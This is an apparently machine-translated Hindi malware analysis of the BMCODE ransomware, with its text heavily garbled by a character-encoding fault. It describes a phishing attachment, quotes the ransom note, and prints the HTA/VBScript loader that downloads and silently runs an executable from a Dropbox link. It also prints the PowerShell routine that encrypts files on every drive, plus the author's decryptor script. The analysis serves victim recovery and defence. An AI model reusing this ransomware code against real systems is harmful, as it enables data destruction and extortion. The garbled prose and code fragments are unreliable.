рд░реВрд╕ рдХреЗ рдПрдХ рдирд┐рд╢реНрдЪрд┐рдд рд╢рд╣рд░ рдореЗрдВ
(рд╢рд╛рдпрдж рдЖрдкрдХрд╛)
рдХреЛрдИ рдЫреЛрдЯреА рдХрдВрдкрдиреА рдирд╣реАрдВ рд╣реИред
рдПрдХ рдХрдорд░рд╛ рдХрд┐рд░рд╛рдП рдкрд░ рд▓рд┐рдпрд╛
рдореЗрдВ NIImorgorvorpromaред
рдЗрд╕ рдХрдВрдкрдиреА рдореЗрдВ рдПрдХ рдХрд░реНрдордЪрд╛рд░реА рд╣реИ рдЬреЛ рдореЗрд▓ рдкрдврд╝рдирд╛ рдкрд╕рдВрдж рдХрд░рддрд╛ рд╣реИред рдпрд╣ рдХрд┐рд╕реА рднреА рддрд░рд╣ рд╕реЗ рдлрд╝рд╛рдЗрд▓ рдЦреЛрд▓рддрд╛ рд╣реИ, рдХрд┐рд╕реА рдиреЗ рдЬрд╛рдирдмреВрдЭрдХрд░ рд╕рдВрд▓рдЧреНрди рд╡реНрдпрдХреНрддрд┐ рдХреЗ рдкрддреНрд░ рдХреЗ рдЖрдВрддреНрд░реЛрдВ рдореЗрдВред рдПрдХ рджреВрд╕рд░реЗ рд╡рд┐рдЪрд╛рд░ рдХреЗ рдмрд┐рдирд╛ рдЪрд▓ рд░рд╣рд╛ рд╣реИ, "рдзрдиреНрдпрд╡рд╛рдж рдиреЛрдЯред рдПрдЪрдЯреАрдП" рдФрд░ рдмрдзрд╛рдИ рдирд╣реАрдВ рджреЗрдЦрдХрд░, рдореИрдВрдиреЗ рдереЛрдбрд╝рд╛ рдзреВрдореНрд░рдкрд╛рди рдХрд░рдиреЗ рдХрд╛ рдлреИрд╕рд▓рд╛ рдХрд┐рдпрд╛ред рдПрдХ рдзреВрдореНрд░рдкрд╛рди рд╡рд┐рд░рд╛рдо рд╕реЗ рд▓реМрдЯрдХрд░, рд╡рд╣ рдЪрд┐рдВрддрд╛ рдореЗрдВ рдкрдврд╝рддрд╛ рд╣реИ:
рдпрджрд┐ рдЖрдк рдЗрд╕ рд╕рдВрджреЗрд╢ рдХреЛ рдкрдврд╝рддреЗ рд╣реИрдВ, рддреЛ рдЗрд╕рдХрд╛ рдорддрд▓рдм рд╣реИ рдХрд┐ рдЖрдкрдХреЗ рдХрдВрдкреНрдпреВрдЯрд░ рдкрд░ рдПрдХ рдЦрддрд░рдирд╛рдХ рд╡рд╛рдпрд░рд╕ рдиреЗ рд╣рдорд▓рд╛ рдХрд┐рдпрд╛ рд╣реИред
рдЗрд╕ рдХрдВрдкреНрдпреВрдЯрд░ рдкрд░ рдЖрдкрдХреА рд╕рднреА рдЬрд╛рдирдХрд╛рд░реА (рджрд╕реНрддрд╛рд╡реЗрдЬ, рдлрд┐рд▓реНрдо рдФрд░ рдЕрдиреНрдп рдлрд╛рдЗрд▓реЗрдВ) рдПрдиреНрдХреНрд░рд┐рдкреНрдЯ рдХреА рдЧрдИ рд╣реИрдВ
рджреБрдирд┐рдпрд╛ рдореЗрдВ рд╕рдмрд╕реЗ рдХреНрд░рд┐рдкреНрдЯреЛрдЧреНрд░рд╛рдлрд┐рдХ рдПрд▓реНрдЧреЛрд░рд┐рдереНрдо рдХрд╛ рдЙрдкрдпреЛрдЧ рдХрд░рдирд╛ RSA1024ред
рдлрд╝рд╛рдЗрд▓реЛрдВ рдХреЛ рдХреЗрд╡рд▓ рдПрдХ рд╡рд┐рд╢реЗрд╖ рдХрд╛рд░реНрдпрдХреНрд░рдо рдХрд╛ рдЙрдкрдпреЛрдЧ рдХрд░рдХреЗ рдмрд╣рд╛рд▓ рдХрд┐рдпрд╛ рдЬрд╛ рд╕рдХрддрд╛ рд╣реИред рдЗрд╕реЗ рдкрд╛рдиреЗ рдХреЗ рд▓рд┐рдП, рдЖрдкрдХреЛ рдЬрд░реВрд░рдд рд╣реИ
рд╣рдореЗрдВ рдЕрдирдмреНрд▓реЙрдХ @tormail.org рдкрд░ рдПрдХ рдИрдореЗрд▓ рд▓рд┐рдЦреЗрдВ
рдпрджрд┐ рдЖрдк рд╣рдорд╛рд░реЗ рдХрд╛рд░реНрдпрдХреНрд░рдо рдХреЗ рдмрд┐рдирд╛ рдбрд┐рдХреНрд░рд┐рдкреНрдЯ рдХрд░рдиреЗ рдХреА рдХреЛрд╢рд┐рд╢ рдХрд░рддреЗ рд╣реИрдВ, рддреЛ рдлрд╛рдЗрд▓реЗрдВ рдХреНрд╖рддрд┐рдЧреНрд░рд╕реНрдд рд╣реЛ рд╕рдХрддреА рд╣реИрдВ!
рдПрдХ рдлрд╝рд╛рдЗрд▓ рдХреЛ рдкрддреНрд░ рдореЗрдВ рд╕рдВрд▓рдЧреНрди рдХрд░реЗрдВ, рдЬреЛ рдбреЗрд╕реНрдХрдЯреЙрдк "READ_ME_NOW !!!!!!ред TXT" рдкрд░ рд╕реНрдерд┐рдд рд╣реИ, рдпрд╛ рдпрд╣ рдлрд╝рд╛рдЗрд▓
рдзрдордХреА рдкрддреНрд░ рдХреЗрд╡рд▓ рдЖрдкрдХреЛ рдФрд░ рдЖрдкрдХреА рдлрд╝рд╛рдЗрд▓реЛрдВ рдХреЛ рдзрдордХреА рджреЗрдВрдЧреЗ! рди рднреВрд▓реЗрдВ: рдХреЗрд╡рд▓ рд╣рдо рдЖрдкрдХреА рдлрд╝рд╛рдЗрд▓реЛрдВ рдХреЛ рдбрд┐рдХреНрд░рд┐рдкреНрдЯ рдХрд░ рд╕рдХрддреЗ рд╣реИрдВ!
pz8FkWJXdijcajJcWfhJ27TGPgcNNEKXDBcsdyzfX + lUoq68eAptVmGNIYLD8eti1kwwdor59pwOC7XM7T + YLccqyeJqc5loxMCKy4pulpulpfcJJ
рдЕрдм рджреВрд╕рд░реЗ рд╢рдмреНрджреЛрдВ рдореЗрдВ рдпрд╣реА рдмрд╛рддред рдХрд░реНрдордЪрд╛рд░реА рдХреЛ рдЕрдиреБрд▓рдЧреНрдирдХ рдХреЗ рд╕рд╛рде рдПрдХ рдкрддреНрд░ рдорд┐рд▓рд╛ "рдзрдиреНрдпрд╡рд╛рдж рдиреЛрдЯред Rarред" рдкрддреНрд░ рдХреЗ рдореБрдЦреНрдп рднрд╛рдЧ рдиреЗ рд╕рдВрдХреЗрдд рджрд┐рдпрд╛ рдХрд┐ рд╕рдВрдЧреНрд░рд╣ рдкрд╛рд╕рд╡рд░реНрдб-рд╕рдВрд░рдХреНрд╖рд┐рдд рдерд╛ рдФрд░ рдПрдХ рдкрд╛рд╕рд╡рд░реНрдб рджрд┐рдпрд╛ рдЧрдпрд╛ рдерд╛ред рдпрд╣ рд╕рд┐рд░реНрдл рдЗрддрдирд╛ рд╣реБрдЖ рдХрд┐ рдЗрди рджрд┐рдиреЛрдВ рдЧреНрд░рд╛рд╣рдХреЛрдВ рдиреЗ рд╕рдорд╛рди рдкрддреНрд░ рднреЗрдЬреЗ рдФрд░ рдХрд░реНрдордЪрд╛рд░реА рдХреЛ рдХреБрдЫ рднреА рд╕рдВрджреЗрд╣ рдирд╣реАрдВ рдерд╛ред рд╕рдВрдЧреНрд░рд╣ рдЦреЛрд▓рдХрд░ рдФрд░ "рдереИрдВрдХ рдпреВ рдиреЛрдЯред рдПрдЪрдЯреАрдП" рдЕрдиреБрд▓рдЧреНрдирдХ рд▓реЙрдиреНрдЪ рдХрд┐рдпрд╛ред рдХреБрдЫ рд╕рдордп рдмрд╛рдж, рд▓рдЧрднрдЧ рд╕рднреА рдлрд╛рдЗрд▓реЛрдВ рдиреЗ .BMCODE рдПрдХреНрд╕рдЯреЗрдВрд╢рди (рдореВрд▓ рдПрдХреНрд╕рдЯреЗрдВрд╢рди рдХреЗ рдкрд╛рда рдХреЛ рд╣рдЯрд╛рдП рдмрд┐рдирд╛ рдЕрдВрдд рддрдХ рдЬреЛрдбрд╝ рджрд┐рдпрд╛) рдХрд╛ рдЕрдзрд┐рдЧреНрд░рд╣рдг рдХрд┐рдпрд╛ рдФрд░ рдкреНрд░рддреНрдпреЗрдХ рдлрд╝реЛрд▓реНрдбрд░ рдореЗрдВ рдЙрдкрд░реЛрдХреНрдд рдкрд╛рда рдХреЗ рд╕рд╛рде READ_ME_NOW !!!!!!! рдХреНрд▓рд┐рдХ рдХрд░реЗрдВред рдЙрдкрдпреЛрдЧрдХрд░реНрддрд╛ рдиреЗ рдХрд╣рд╛ "рдЬрд╣рд╛рдВ рдпрд╣ рдЖрд╡рд╢реНрдпрдХ рд╣реИ" рдФрд░ "рдЬрд┐рд╕рдХреА рдЖрд╡рд╢реНрдпрдХрддрд╛ рд╣реИ" рд╡реНрдпрд╛рдкрд╛рд░ рдХреЗ рд▓рд┐рдП рдиреАрдЪреЗ рдЙрддрд░ рдЧрдпрд╛ред
рд╕рдмрд╕реЗ рдкрд╣рд▓реЗ, рдШрдмрд░рд╛рд╣рдЯ рдХреЗ рдмрд┐рдирд╛, рдЙрдиреНрд╣реЛрдВрдиреЗ рдЗрд╕ * .рд╣рдЯрд╛ рдФрд░ рджреЗрдЦрд╛:
рдЗрд╕рдХреЗ рдмрд╛рдж рдХреЗ рдореВрд▓ рдХреЛрдб рдХреЛ рдереЛрдбрд╝рд╛ рд╕рдВрд╢реЛрдзрд┐рдд рдХрд┐рдпрд╛ рдЧрдпрд╛ рд╣реИ рдФрд░ рдЯрд┐рдкреНрдкрдгреА рдХреА рдЧрдИ рд╣реИ рддрд╛рдХрд┐ рдХреЛрдИ рдЖрдХрд╕реНрдорд┐рдХ рдкреНрд░рдХреНрд╖реЗрдкрдг рди рд╣реЛредрд╣рдЯ рдХреЛрдб<!-- base64--> <html> <head> <meta charset="windows-1251"> </head> <HTA:APPLICATION ID="objHTA_Info" APPLICATIONNAME="HTA_Info" SINGLEINSTANCE="yes" > <body> <script language=VBScript> 'Execute base64decode(" base64 ") Function base64decode(data) a="CDO.Message" set b=CreateObject(a) With b.BodyPart .ContentTransferEncoding = "base64" .Charset = "windows-1251" With .GetEncodedContentStream .WriteText data .Flush End With With .GetDecodedContentStream .Charset = "utf-8" base64decode = .ReadText End With End With End Function </script> </body> </html>
рд╣рдо рдЖрдЧреЗ рджреЗрдЦрддреЗ рд╣реИрдВ (рд╡рд┐рднрд╛рдЧ рдиреЗ рд╣рдВрд╕рддреЗ рд╣реБрдП рдмрддрд╛рдпрд╛ рдХрд┐ рд╕рдм рдХреБрдЫ рдХрд┐рддрдирд╛ рд╢рд╛рдирджрд╛рд░ рдФрд░ рд╕рд░рд▓ рд╣реИ):
рдмреЗрд╕64 рдбрд┐рд╕реНрдХ рдХрд╛ рдирд┐рд╖реНрдкрд╛рджрди рдХрд░реЗрдВ ( a1686979793=1686979793: Const SYSTEM32 = &H25:Set # fso = CreateObject("Scripting.FileSystemObject"): Set objShell = CreateObject("Shell.Application"): Set wshShell = CreateObject( "WScript.Shell" ): #Set objFolder = objShell.Namespace(SYSTEM32): Set objFolderItem = objFolder.Self: filepath = replace(objHTA_Info.commandLine,chr(34),""): arguments = " -command $path=((get-content -Path '" + filepath + "' -totalcount 1) -split '%'[1]; #$bytes = [System.Convert]::FromBase64String($path); $decoded = [System.Text.Encoding]::UTF8.GetString($bytes); Invoke-Expression $decoded": Path = objFolderItem.Path + "\WindowsPowerShell\v1.0\powershell.exe": newPath = Path & arguments:RarPath = wshShell.ExpandEnvironmentStrings("%TMP%") & "\powershell.exe": TestPath = wshShell.ExpandEnvironmentStrings("%TMP%") & "\powershell\powershell.exe":. appNewPath = wshShell.ExpandEnvironmentStrings("%TMP%") & "\powershell\powershell.exe" & arguments: If (fso.FileExists(Path)) Then: wshShell.Run newPath, 0, False: Else : #If Not (fso.FileExists(TestPath)) Then: dim xHttp: Set xHttp = createobject("Microsoft.XMLHTTP"): dim bStrm: Set bStrm = createobject("Adodb.Stream"): xHttp.Open "GET", "https://dl.dropbox.com/sh/wn8x35r9l9wsitn/XSwafOFh9E/powershell.exe?dl=1", False: xHttp.Send: with bStrm: .type = 1: .open: #.write xHttp.responseBody: .savetofile RarPath, 2: end with: wshShell.Run RarPath, 0, True: End If : wshShell.Run appNewPath, 0, True : End If
рдореЛрдЯреЗ рддреМрд░ рдкрд░ рдпрд╣ рд╕рдордЭрдиреЗ рдХреЗ рдмрд╛рдж рдХрд┐ PowerShell рдХреЛ dropbox.com рдкрд░ рдЦрд╛рддреЗ рд╕реЗ рдбрд╛рдЙрдирд▓реЛрдб рдХрд┐рдпрд╛ рдЬрд╛ рд░рд╣рд╛ рд╣реИ, рд╣рдо рдЗрд╕ рдЯреБрдХрдбрд╝реЗ рдореЗрдВ рд░реБрдЪрд┐ рдЦреЛ рд░рд╣реЗ рд╣реИрдВред
рдЕрдЧрд▓рд╛:
рдмреЗрд╕ 64 рдореЗрдВ рдкрд╣рд▓рд╛ рдЯреБрдХрдбрд╝рд╛ $1686979793=1686979793; $ErrorActionPreference=; if(((Get-Process -Name powershell).count) -ge 2){exit}$ref=[Reflection.Assembly]::LoadWithPartialName('System.Security'); Add-Type -Assembly System.Web; $ek=(get-wmiobject Win32_ComputerSystemProduct).UUID; [byte[]]$bytes=[system.Text.Encoding]::Unicode.GetBytes($ek); $basekey=; #$rsa = New-Object System.Security.Cryptography.RSACryptoServiceProvider; #$rsa.ImportCspBlob([system.Convert]::FromBase64String($basekey)); $enckey=[system.Convert]::ToBase64String($rsa.Encrypt($bytes, $false)); $text= READ_ME_NOW!!!!!!.TXT` + $enckey; #function Encrypt-File($item, $Passphrase){ $salt=; $init=; $r = new-Object System.Security.Cryptography.RijndaelManaged; $pass = [Text.Encoding]::UTF8.GetBytes($Passphrase); $salt = [Text.Encoding]::UTF8.GetBytes($salt); $r.Key = (new-Object Security.Cryptography.PasswordDeriveBytes $pass, $salt, , 5).GetBytes(32); $r.IV = (new-Object Security.Cryptography.SHA1Managed).ComputeHash( [Text.Encoding]::UTF8.GetBytes($init) )[0..15]; $r.Padding=; $r.Mode=; $c = $r.CreateEncryptor(); $ms = new-Object IO.MemoryStream; $cs = new-Object Security.Cryptography.CryptoStream $ms,$c,; $cs.Write($item, 0,$item.Length); $cs.Close(); $ms.Close(); $r.Clear(); return $ms.ToArray(); } #$disks=Get-PSDrive|Where-Object {$_.Free -gt 50000}|Sort-Object -Descending; foreach($disk in $disks){gci $disk.root -Recurse -Include , , |%{try {$file=[io.file]::Open($_, Open', 'ReadWrite'); #if ($file.Length -lt "40960"){$size=$file.Length}else{$size="40960"} [byte[]]$buff = new-object byte[] $size; $ToEncrypt = $file.Read($buff, 0, $buff.Length); $file.Position='0'; #$Encrypted=Enckrypt-File $buff $ek; $file.Write($Encrypted, 0, $Encrypted.Length); $file.Close(); #$newname=$_.Name+'.BMCODE'; #ren -Path $_.FulName -NewName $nename -Force; $path=$_.DirectoryName+'\READ_ME_NOW!!!!!!.TXT'; if(!(Test-Path $path)){sc -pat $path -va $text} } catch{} } } H5NdEgi49DIHtJTXm + mcVHnvUpYiNEnxpFj / UJXVDg0F2rfWFpnyqHJ0dbyjsOCwMX0eRyp2VxrWFzOHIM6QpevxGF9izXeNq7 + OzBuo11V / 7EmvQBW2sfuNEOP7zdUw0DFKoK + X2Taewaki1LGYhpshjqg =="; $1686979793=1686979793; $ErrorActionPreference=; if(((Get-Process -Name powershell).count) -ge 2){exit}$ref=[Reflection.Assembly]::LoadWithPartialName('System.Security'); Add-Type -Assembly System.Web; $ek=(get-wmiobject Win32_ComputerSystemProduct).UUID; [byte[]]$bytes=[system.Text.Encoding]::Unicode.GetBytes($ek); $basekey=; #$rsa = New-Object System.Security.Cryptography.RSACryptoServiceProvider; #$rsa.ImportCspBlob([system.Convert]::FromBase64String($basekey)); $enckey=[system.Convert]::ToBase64String($rsa.Encrypt($bytes, $false)); $text= READ_ME_NOW!!!!!!.TXT` + $enckey; #function Encrypt-File($item, $Passphrase){ $salt=; $init=; $r = new-Object System.Security.Cryptography.RijndaelManaged; $pass = [Text.Encoding]::UTF8.GetBytes($Passphrase); $salt = [Text.Encoding]::UTF8.GetBytes($salt); $r.Key = (new-Object Security.Cryptography.PasswordDeriveBytes $pass, $salt, , 5).GetBytes(32); $r.IV = (new-Object Security.Cryptography.SHA1Managed).ComputeHash( [Text.Encoding]::UTF8.GetBytes($init) )[0..15]; $r.Padding=; $r.Mode=; $c = $r.CreateEncryptor(); $ms = new-Object IO.MemoryStream; $cs = new-Object Security.Cryptography.CryptoStream $ms,$c,; $cs.Write($item, 0,$item.Length); $cs.Close(); $ms.Close(); $r.Clear(); return $ms.ToArray(); } #$disks=Get-PSDrive|Where-Object {$_.Free -gt 50000}|Sort-Object -Descending; foreach($disk in $disks){gci $disk.root -Recurse -Include , , |%{try {$file=[io.file]::Open($_, Open', 'ReadWrite'); #if ($file.Length -lt "40960"){$size=$file.Length}else{$size="40960"} [byte[]]$buff = new-object byte[] $size; $ToEncrypt = $file.Read($buff, 0, $buff.Length); $file.Position='0'; #$Encrypted=Enckrypt-File $buff $ek; $file.Write($Encrypted, 0, $Encrypted.Length); $file.Close(); #$newname=$_.Name+'.BMCODE'; #ren -Path $_.FulName -NewName $nename -Force; $path=$_.DirectoryName+'\READ_ME_NOW!!!!!!.TXT'; if(!(Test-Path $path)){sc -pat $path -va $text} } catch{} } }
рд╣рдо рдкрдврд╝рддреЗ рд╣реИрдВ, рдкрдврд╝рддреЗ рд╣реИрдВ рдФрд░ рд░рд╛рд╣рдд рдХреЗ рд╕рд╛рде рд╕рд╛рдВрд╕ рд▓реЗрддреЗ рд╣реИрдВред рдлрд╝рд╛рдЗрд▓реЛрдВ рдХреЗ рдХреБрд▓ рдПрдиреНрдХреНрд░рд┐рдкреНрд╢рди рдХреА рдХреЛрдИ рдмрд╛рдд рдирд╣реАрдВ рд╣реИред
So. рд╕рдмрд╕реЗ рдкрд╣рд▓реЗ, рд╣рдо рдЪрд╛рдмрд┐рдпрд╛рдБ рдвреВрдВрдв рд░рд╣реЗ рд╣реИрдВред рд╣рдо рд▓рд╛рдЗрдиреЗрдВ рджреЗрдЦрддреЗ рд╣реИрдВ:
$Encrypted=Enckrypt-File $buff $ek; $ek=(get-wmiobject Win32_ComputerSystemProduct).UUID;
рдФрд░ рдпрд╣ рд╕рдордЭреЗрдВ рдХрд┐ рдХреБрдВрдЬреА рдХрдВрдкреНрдпреВрдЯрд░ рдХреЗ UUID рдХрд╛ рдЙрдкрдпреЛрдЧ рдХрд░рддреА рд╣реИред рдЗрд╕ рдХреНрд╖рдг рд╕реЗ рдпрд╣ рдФрд░ рднреА рдЖрд╕рд╛рди рд╣реЛ рдЬрд╛рддрд╛ рд╣реИ рдФрд░ рд▓рдЧрднрдЧ рд╕рд╛рд╣рд╕рдкреВрд░реНрд╡рдХ рдкрд╣рд▓реЗ рднрд╛рдЧ рдХреЗ рдмрд╛рд░реЗ рдореЗрдВ рднреВрд▓ рдЬрд╛рддреЗ рд╣реИрдВ, рдЬрд╣рд╛рдВ рдПрдХ рдбрд░рд╛рд╡рдиреА рдХреБрдВрдЬреА рдмрдирддреА рд╣реИ, рдЬрд┐рд╕реЗ * .TXT рдореЗрдВ рдЬреЛрдбрд╝рд╛ рдЬрд╛рддрд╛ рд╣реИред
рдЖрдЧреЗ рд╣рдо рджреЗрдЦрддреЗ рд╣реИрдВ:
if ($file.Length -lt "40960"){$size=$file.Length}else{$size="40960"}; [byte[]]$buff = new-object byte[] $size;
рдЗрд╕рд╕реЗ рд╣рдореЗрдВ рдкрддрд╛ рдЪрд▓рддрд╛ рд╣реИ рдХрд┐ рдкреВрд░реА рдлрд╝рд╛рдЗрд▓ рдПрдиреНрдХреНрд░рд┐рдкреНрдЯреЗрдб рдирд╣реАрдВ рд╣реИ, рд▓реЗрдХрд┐рди рдХреЗрд╡рд▓ рдкрд╣рд▓рд╛ рднрд╛рдЧ рдпрджрд┐ рдлрд╝рд╛рдЗрд▓ рдХрд╛ рдЖрдХрд╛рд░ 40kb рд╕реЗ рдЕрдзрд┐рдХ рд╣реИ, рдпрджрд┐ рдХрдо рд╣реИ, рддреЛ рдкреВрд░реА рдлрд╝рд╛рдЗрд▓ред
рдпрд╣ рдХрдВрдкреНрдпреВрдЯрд░ рдХреЗ рдпреВрдпреВрдЖрдИрдбреА рдХрд╛ рдкрддрд╛ рд▓рдЧрд╛рдиреЗ рдФрд░ рдбрд┐рдХреНрд░рд┐рдкреНрд╢рди рдХреЗ рд▓рд┐рдП рдПрдХ рд╕реНрдХреНрд░рд┐рдкреНрдЯ рд▓рд┐рдЦрдиреЗ рдХреЗ рд▓рд┐рдП рдмрдиреА рд╣реБрдИ рд╣реИред
рд╣рдо UUID рдХреЛ рдЙрд╕реА рдХрдорд╛рдВрдб рд╕реЗ рдкрд╣рдЪрд╛рдирддреЗ рд╣реИрдВред
(get-wmiobject Win32_ComputerSystemProduct).UUID
PowerShell рдореЗрдВ рдЪрд▓ рд░рд╣рд╛ рд╣реИ, рдЬрд┐рд╕реЗ рдореИрд▓рд╡реЗрдпрд░ рдиреЗ рд╕рд╛рд╡рдзрд╛рдиреАрдкреВрд░реНрд╡рдХ рдбрд╛рдЙрдирд▓реЛрдб рдХрд┐рдпрд╛ рдФрд░% TEMP% рд╕реЗ рдирд╣реАрдВ рд╣рдЯрд╛рдпрд╛ред
рдЕрдм рд╕реНрдХреНрд░рд┐рдкреНрдЯ рд▓рд┐рдЦрдиреЗ рдХреЗ рд▓рд┐рдПред рдХрдард┐рдирд╛рдИ рдХреЗрд╡рд▓ рд╕рдордЭ рдореЗрдВ рдЙрддреНрдкрдиреНрди рд╣реБрдИ (рдФрд░ рдпрд╣ рдЬреНрдЮрд╛рди рдХреА рдХрдореА рдХреЗ рдХрд╛рд░рдг рдерд╛, рдХреНрдпреЛрдВрдХрд┐ рдпрд╣ рдкрд╣рд▓реЗ рд╕реЗ рдореБрдарднреЗрдбрд╝ рдХрд░рдиреЗ рдХреЗ рд▓рд┐рдП рдЖрд╡рд╢реНрдпрдХ рдирд╣реАрдВ рдерд╛), рдХрд┐ рдПрдо $ рдХреЗ рдЙрджрд╛рд╣рд░рдгреЛрдВ рдХреЗ рдЕрдиреБрд╕рд╛рд░, рдРрд╕реЗ рдХрд╛рд░реНрдп рдПрдХ рдкреИрд░рд╛рдореАрдЯрд░ рдХреЗ рд░реВрдк рдореЗрдВ рдПрдХ рд╕реНрдЯреНрд░рд┐рдВрдЧ рд╕реЗ рдЧреБрдЬрд░рддреЗ рд╣реИрдВ, рд▓реЗрдХрд┐рди рдпрд╣рд╛рдВ рд╡реЗ рдмрд╕ рдПрдХ рд╕рд░рдгреА рдХрд╛ рдЙрдкрдпреЛрдЧ рдХрд░рддреЗ рд╣реИрдВред
рдЕрд╕рд▓ рдореЗрдВ, рдореИрдВрдиреЗ рдЬреЛ рд╕реАрдЦрд╛ред
рдпрд╣ рдХреЛрдб рдХрд╛рдо рдХрд░ рд░рд╣рд╛ рд╣реИ, рдЬрд┐рд╕рдореЗрдВ рдХреЛрдИ рдмрджрд▓рд╛рд╡ рдирд╣реАрдВ рд╣реИ рдФрд░ рдХрд╛рдо рдХреА рдкреНрд░рдХреНрд░рд┐рдпрд╛ рдХреЛ рдЯреНрд░реИрдХ рдХрд░рдиреЗ рдХреЗ рд▓рд┐рдП рдЕрддрд┐рд░рд┐рдХреНрдд рдирд┐рд╖реНрдХрд░реНрд╖ рд╣реИрдВредDec_beta, ps1 cls $null = [Reflection.Assembly]::LoadWithPartialName("System.Security"); $ek='00000000-0000-0000-0000-6CF04916E0EA'; function Decrypt-String($Encrypted, $Passphrase){ $salt="BMCODE hack your system" $init="BMCODE INIT" $r = new-Object System.Security.Cryptography.RijndaelManaged $pass = [Text.Encoding]::UTF8.GetBytes($Passphrase) $salt = [Text.Encoding]::UTF8.GetBytes($salt) $r.Key = (new-Object Security.Cryptography.PasswordDeriveBytes $pass, $salt, "SHA1", 5).GetBytes(32) $r.IV = (new-Object Security.Cryptography.SHA1Managed).ComputeHash( [Text.Encoding]::UTF8.GetBytes($init) )[0..15] $r.Padding="Zeros"; $r.Mode="CBC"; $d = $r.CreateDecryptor() $ms = new-Object IO.MemoryStream @(,$Encrypted) $cs = new-Object Security.Cryptography.CryptoStream $ms,$d,"Read" $Enc=$cs.read($Encrypted, 0,$Encrypted.Length) $cs.Close(); $ms.Close(); $r.Clear(); return [byte[]]$Encrypted = $ms.ToArray() } $dir= read-host " (: C:\, D:\111\)" gci $dir -Recurse -Include "*.BMCODE" |%{try {$_; $file=[io.file]::Open($_, 'Open', 'ReadWrite'); #Wrire-host $file.Name; write-Host " : $file.Length"; If ($file.Length -lt "40960"){$size=$file.Length} Else{$size="40960"} [byte[]]$buff = new-object byte[] $size; $ToEncrypt = $file.Read($buff, 0, $buff.Length); write-host $size; $file.Position='0'; $arr=Decrypt-String $buff $ek; Write-host $_.Name Write-host $_.FullName $file.Write($arr, 0, $arr.Length); Write-host "Done"; $file.Close(); $newname=$_.Name -replace '.BMCODE',''; ren -Path $_.FullName -NewName $newname -Force; Write-Host " : $_.Name"; $hnya=$_.DirectoryName+'\READ_ME_NOW!!!!!!.TXT' rm $hnya; } catch{} }
рд╡рд╣ рдХреНрдпрд╛ рдХрд░рддрд╛ рд╣реИ, рдЬрд░реВрд░рдд рдкрдбрд╝рдиреЗ рдкрд░ рдХреНрдпрд╛ рдмрджрд▓рд╛ рдЬрд╛рдирд╛ рдЪрд╛рд╣рд┐рдП:1) рд╣рдо рд╡рд╛рдВрдЫрд┐рдд рдХреБрдВрдЬреА рдХреЗ рд╕рд╛рде рдореИрдиреБрдЕрд▓ рдЪрд░
$ ek рдореЗрдВ рд╕реЗрдЯ рдХрд░рддреЗ рд╣реИрдВ (рд╣рдорд╛рд░реЗ рдорд╛рдорд▓реЗ рдореЗрдВ, UUID)
2) рдбреАрдХреЛрдбрд┐рдВрдЧ рдлрд╝рдВрдХреНрд╢рди рдХрд╛ рд╡рд░реНрдгрди рдЬреЛ рдПрдХ рд╕рд░рдгреА рджреЗрддрд╛ рд╣реИред рд╣рдордиреЗ рдорд╛рд▓рд╡реЗрдпрд░ рдХреЗ рд╕реНрд░реЛрдд рдХреЛрдб рдореЗрдВ рд╡реЗ рдЪрд░
рдирдордХ рдФрд░
$ init рдирд┐рд░реНрдзрд╛рд░рд┐рдд рдХрд┐рдП рдереЗред
3) рд╣рдо рд▓реЙрдиреНрдЪрд░ рдХреЛ рдЙрд╕ рдкрде рдХреЛ рдирд┐рд░реНрджрд┐рд╖реНрдЯ рдХрд░рдиреЗ рдХреЗ рд▓рд┐рдП рдХрд╣рддреЗ рд╣реИрдВ рдЬрд┐рд╕рд╕реЗ рдлрд╝рд╛рдЗрд▓ рдЦреЛрдЬ рд╢реБрд░реВ рд╣реЛрдЧреА (рд╣рдо рд╕рдмрдлрд╝реЛрд▓реНрдбрд░реНрд╕ рдХреА рддрд▓рд╛рд╢ рдХрд░рддреЗ рд╣реИрдВ)
4) рдирд┐рд░реНрджрд┐рд╖реНрдЯ рдПрдХреНрд╕рдЯреЗрдВрд╢рди (.BMCODE) рдХреЗ рд╕рд╛рде рдорд┐рд▓реА рдкреНрд░рддреНрдпреЗрдХ рдлрд╝рд╛рдЗрд▓ рдХреЛ рдбрд┐рдХреЛрдб рдХрд┐рдпрд╛ рдЧрдпрд╛ рдФрд░ рд╕рд╛рдорд╛рдиреНрдп рдирд╛рдо рджрд┐рдпрд╛ рдЧрдпрд╛ред
5) рд░рд╛рд╕реНрддреЗ рдХреЗ рд╕рд╛рде, READ_ME_NOW !!!!!!ред TXT рдирд╛рдо рдХреА рдлрд╛рдЗрд▓реЗрдВ, рдЬреЛ рдореИрд▓рд╡реЗрдпрд░ рдмрдирд╛рдИ рдЧрдИ рд╣реИрдВ, рд╣рдЯрд╛ рджреА рдЬрд╛рддреА рд╣реИрдВред
рдХреЛрдб рд╕рд╣реА рдирд╣реАрдВ рд╣реИ рдФрд░ рдмрд╣реБрдд рд╕рд░рд▓ рдФрд░ рдлрд┐рд░ рд╕реЗ рд▓рд┐рдЦрд╛ рдЬрд╛ рд╕рдХрддрд╛ рд╣реИ, рд▓реЗрдХрд┐рди рд╕рдмрд╕реЗ рдорд╣рддреНрд╡рдкреВрд░реНрдг рдмрд╛рдд - рдпрд╣ рдХрд╛рдо рдХрд░рддрд╛ рд╣реИ рдФрд░ рдорджрдж рдХрд░рддрд╛ рд╣реИред
рд╡рд╣ рд╕рдм рд╣реИред рдореБрдЭреЗ рдЙрдореНрдореАрдж рд╣реИ рдХрд┐ рдпрд╣ рд▓реЗрдЦ рдЙрди рд╕рднреА рдХреЛ рдорджрдж рдХрд░реЗрдЧрд╛ рдЬреЛ рдкрд╣рд▓реЗ рд╕реЗ рд╣реА рдПрдХ рд╕рдорд╛рди рд╕рдорд╕реНрдпрд╛ рдХрд╛ рд╕рд╛рдордирд╛ рдХрд░ рдЪреБрдХреЗ рд╣реИрдВ рдФрд░ рдпрд╣ рдирд╣реАрдВ рдЬрд╛рдирддреЗ рдХрд┐ рдХреНрдпрд╛ рдХрд░рдирд╛ рд╣реИред рдЬреИрд╕рд╛ рдХрд┐ рд╡реЗ RuNet рдореЗрдВ рдХрд╣рддреЗ рд╣реИрдВ, рд╕рд╛рдЗрдмрд░ рдЕрдкрд░рд╛рдзрд┐рдпреЛрдВ рдХреЛ рдбрд┐рдХреНрд░рд┐рдкреНрд╢рди рдХреЗ рд▓рд┐рдП 3,000 рд╕реЗ 10,000 рд░реВрдмрд▓ рдХреА рдЖрд╡рд╢реНрдпрдХрддрд╛ рд╣реЛрддреА рд╣реИ, рд▓реЗрдХрд┐рди рдЕрдзрд┐рдХ рдкрд░рд┐рд╖реНрдХреГрдд рдорд╛рд▓рд╡реЗрдпрд░ 